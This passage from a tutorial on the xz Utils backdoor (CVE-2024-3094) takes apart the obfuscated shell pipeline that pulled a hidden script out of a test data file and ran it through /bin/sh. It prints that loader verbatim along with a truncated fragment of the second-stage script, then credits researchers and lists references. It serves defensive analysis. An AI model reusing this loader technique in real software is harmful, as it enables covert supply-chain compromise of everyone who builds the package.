export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
```
Let's ignore the multiple attempts to terminate the script when the Operating system isn't Linux, in the next portion of the commands:
```bash
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
```
the script attempts to locate the root directory of the XZ Utils source tree via the `srcdir` variable set in the `config.status` GNU Autoconf build intermediate file as the build configuration program may not be run in the root directory of the source tree in some software build scenarios(like in distribution packaging).
In the last portion of the script commands the following commands are executed:
```bash
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)"
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| eval $i \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
Smells like another round of code/data obfuscation, let's divide and conquer the command pipeline.
In the first component of the command pipeline:
```bash
srcdir="xz-git"
xz_opts=(
# Decompress compressed data
--decompress
# Output decompressed data to the standard output
# device
--stdout
)
xz "${xz_opts[@]}" "${srcdir}/tests/files/good-large_compressed.lzma"
```
the script decompresses the seemingly benign tests/files/good-large_compressed.lzma test data to the command's output.
The `i` shell variable essentially houses a _subshell_ of AND LIST commands to run, after doing the parameter expansion:
```bash
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| eval "((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)" \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
The `eval` command interprets the following string as a script. It doesn't seem to matter much in this occasion so let's drop it for now:
```bash
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| (
(head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +939
) \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
| /bin/sh
```
As the name indicates, the subshell markup launches another shell interpreter process as the current shell shell interpreter's sub-process, and run the enclosed commands inside that process. The shell interpreter will receive the output from the previous component of the command pipeline, process it using the commands in the sub shell, then output them to the standard output device(stdout), which is then redirected as the standard input(stdin) data of the next component in the pipeline.
The subshell commands simply:
1. Drop(>/dev/null) 1,024 bytes of the the start of the data stream.
1. Output 2,048 bytes of the start of the data stream.
1. Repeat 1. and 2. 16 times.
1. Drop(>/dev/null) 1,024 bytes of the the start of the data stream.
1. Output 939 bytes of the start of the data stream.
The next shell pipeline component:
```bash
tail_opts=(
# Output the content starting with the 32133 byte of the input file
--bytes +31233
)
tail "${tail_opts[@]}"
```
filters the bytes before the 32133 byte.
The next shell pipeline component:
```bash
tr \
"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" \
"\0-\377"
```
shuffles the data that contains
The next shell pipeline component:
```bash
xz_opts=(
# Decompress compressed data
--decompress
# Decompresses a _raw_ LZMA1 stream
--format raw
--lzma1
# Output decompressed data to the standard output
# device
--stdout
)
xz "${xz_opts[@]}"
```
Decompresses the data by assuming the data is a raw LZMA1 stream, which is a very specific decompression parameter combination.
By running the pipeline but instead of piping to /bin/sh, redirect the output to a file we can retrieve the deobfuscation result:
```bash!
(
xz -dc $srcdir/tests/files/good-large_compressed.lzma \
| (
(head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +2048 \
&& (head -c +1024 >/dev/null) \
&& head -c +939
) \
| tail -c +31233 \
| tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377"
) \
| xz -F raw --lzma1 -dc \
> good-large_compressed.deobfuscated
```
Surprise, surprise! [Another shell script](https://pastebin.com/xvcM9V9x)!
```bash
P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
...stripped...
```
This time it's also a heavily obfuscated shell script as well, discourage researchers for digging deeper into the abyss.
As analysing the script requires deep understanding of the following subjects I have to give up and just look for answers from other people now:
* AWK
* GCC
* GNU ld
* glibc
* libtool
I would suggest checking out the [research!rsc: The xz attack shell script](https://research.swtch.com/xz-script) article by [Russ Cox](https://swtch.com/~rsc/) who have explains what the segments in this script (may) do.
## Credits
The following, included but not limited, people helps during the writing of this tutorial:
* We would like to thank OooP!(supposed to be 0xlane) from the #xz-backdoor-reversing chat room for sharing [their backdoor extraction project](https://github.com/0xlane/xz-cve-2024-3094).
* We would like to thank [Sam James](sam@cmpct.info) for help on:
+ Retrieving the (supposed to be) original tainted XZ Utils release archives.
+ Determining the actual software versions the potential evil actor uses to generate the release archive.
* We would like to thank stanley.wang @ the HackMD discord for the ToC panel width workaround.
* We sould like to thank Bertram(int-e) from the #tukaani IRC channel for the help on reviewing [the "determine which version of the Autotools components are actually used in the tainted release archive" section](#Determine-the-software-used-to-generate-the-build-system-files)
## References
During the writing of this tutorial, the following third-party materials are referenced:
* [Wayback Machine snapshots of the https://github.com/tukaani-project/xz/releases/download/\* URLs](https://web.archive.org/web/*/https://github.com/tukaani-project/xz/releases/download/*)
Creditable snapshots of the (now inaccessible) GitHub Releases upstream release archives.
* [0xlane/xz-cve-2024-3094: XZ Backdoor Extract(Test on Ubuntu 23.10)](https://github.com/0xlane/xz-cve-2024-3094)
Provides detailed process of extracting the malware payload, by 0xlane.
* [thesamesam/xz-archive: Archive of xz releases for backdoor analysis.](https://github.com/thesamesam/xz-archive)
Provides backups of the recent XZ release archives, by [Sam James](https://github.com/thesamesam).
* [Web of trust - Wikipedia](https://en.wikipedia.org/wiki/Web_of_trust)
For providing basic info regarding the PGP web of trust model.
* [Docker security | Docker Docs](https://docs.docker.com/engine/security/#docker-daemon-attack-surface)
Explains the security implications of allowing a regular user to have access to the Docker Daemon control socket.
* [Bind mounts | Docker Docs](https://docs.docker.com/storage/bind-mounts/)
Explains how to create bind mount in the Docker container.
* [Arrays (Bash Reference Manual)](https://www.gnu.org/software/bash/manual/html_node/Arrays.html)
Explains how to use the indexed array assignment syntax of the Bash scripting language.
* [Shell Parameter Expansion (Bash Reference Manual)](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html)
Explains the parameter expansion feature of the Bash scripting language.
* [Mirrors : Ubuntu](https://launchpad.net/ubuntu/+archivemirrors)
Enumerate the list of the Ubuntu software archive mirror services.
* [ISO 3166-1 alpha-2 - Wikipedia](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2)
Explains the country code that (likely) used for the country Ubuntu software archive mirror domains.
* [Pretty Good Privacy - Wikipedia](https://en.wikipedia.org/wiki/Pretty_Good_Privacy)
Explains the usage of the PGP encryption solution.
* [Web of trust - Wikipedia](https://en.wikipedia.org/wiki/Web_of_trust)
Explains the concept of the PGP web of trust.
* [Networking overview | Docker Docs](https://docs.docker.com/network/#dns-services)
Explains how to specify custom DNS service settings to the guest container.
* [GNU Build System (automake)](https://www.gnu.org/software/automake/manual/html_node/GNU-Build-System.html)
Explains the basic concepts of the GNU Build System.
* The gpg(1) manual page
For the format and usage of the `--receive-keys` `gpg` command-line option.
* [gnupg - Error "gpg: keyserver receive failed: No name" - Stack Overflow](https://stackoverflow.com/questions/66217436/error-gpg-keyserver-receive-failed-no-name)
Explains how to do if GnuPG cannot retrieve the public key.
* [debian/patches/Use-hkps-keys.openpgp.org-as-the-default-keyserver.patch · bb14f4ece6fa97bfc51e94318660682bcbaf5c36 · Debian / gnupg2 · GitLab](https://salsa.debian.org/debian/gnupg2/-/blob/bb14f4ece6fa97bfc51e94318660682bcbaf5c36/debian/patches/Use-hkps-keys.openpgp.org-as-the-default-keyserver.patch)
Explains the default PGP keyserver choice for Debian.
* [OR Lists | Lists | Shell Commands | Shell Command Language | The Open Group Base Specifications Issue 7, 2018 edition](https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_09_03_08)
Explains the OR LIST syntax of the POSIX shell command language.
* [TZ | Other Environment Variables | Environment Variables | Base Definitions | The Open Group Base Specifications Issue 7, 2018 edition](https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap08.html#tag_08_03)
[TZ Variable (The GNU C Library)](https://www.gnu.org/software/libc/manual/html_node/TZ-Variable.html)
Explains the supported syntaxes of the TZ environment variable's value.
* [Prime meridian - Wikipedia](https://en.wikipedia.org/wiki/Prime_meridian)
Explains the concept of the Prime meridian.
* [List of time zone abbreviations - Wikipedia](https://en.wikipedia.org/wiki/List_of_time_zone_abbreviations)
Enumerates a list of popular time zone abbreviations.
* [Coordinated Universal Time - Wikipedia](https://en.wikipedia.org/wiki/Coordinated_Universal_Time)
Explains the concept of the Coordinated Universal Time(UTC).
* [GNU gettext utilities](https://www.gnu.org/software/gettext/manual/gettext.html#autopoint-Invocation)
Explains what the `autopoint` command will do.
* [Writing Autoconf Input (Autoconf)](https://www.gnu.org/savannah-checkouts/gnu/autoconf/manual/autoconf-2.72/html_node/Writing-Autoconf-Input.html)
Explains the concept of the configure.ac Autoconf input file.
* The `dpkg-divert`(1) manual page
Explains how to use the `dpkg-divert` command to rename a file installed from dpkg.
* [Detailed Description of Unified Format - Unified Format - Showing Differences in Their Context - `diff` Output Formats - GNU Diffutils manual](https://www.gnu.org/software/diffutils/manual/html_node/Detailed-Unified.html#Detailed-Description-of-Unified-Format)
Explains the unified diff format.
* [Double Quotes - Quoting - Shell Syntax - Shell Syntax - Basic Shell Features - Bash Reference Manual](https://www.gnu.org/software/bash/manual/html_node/Double-Quotes.html)
Explains how the double-quoted string in bash handles backslash sequences.
* [`eval` - Bourne Shell Builtins - Shell Builtin Commands - Bash Reference Manual](https://www.gnu.org/software/bash/manual/bash.html#index-eval)
Explains how the `eval` Bash builtin command works.
* [Escape Character - Quoting - Shell Syntax - Basic Shell Features - Bash Reference Manual](https://www.gnu.org/software/bash/manual/html_node/Escape-Character.html)
Explains how raw backslash-escaped character sequences work.
* [The "s" Command (sed, a stream editor)](https://www.gnu.org/software/sed/manual/html_node/The-_0022s_0022-Command.html)
Explains how the backslash escape sequences are interpreted in the _replacement_ text of the `s` sed command.
* [Grouping Commands - Bash Reference Manual](https://www.gnu.org/software/bash/manual/bash.html#Command-Grouping)
Explains the syntax and effect of the subshell markup.
* The head(1) manual page
Explains how the `-c` command-line option functions.
* The tail(1) manual page
Explains how the `-c` command-line option functions.
* Bash manual > Basic Shell Features > Shell Syntax > Quoting > Double Quotes
Explains how the backslash sequences are interpreted in the double-quoted strings.
* The tr(1) manual page
Explains how the `tr` interprets the \NNN octal number sequence.
* [research!rsc: The xz attack shell script](https://research.swtch.com/xz-script)
Explains the logic of the extracted shell script from the maliciously crafted test data.
---
This work is released under Public Domain, refer the [workspace homepage](https://hackmd.io/@cve-2024-3094/home) for more details.
This work is initially written by [林博仁(Buo-ren Lin)](https://brlin.tw), attributions will be appreciated.
<style>
#ui-toc {
/* Fix the ToC mobile interface not expandable horizontally by
* the user.
*/
resize: horizontal;
}
</style>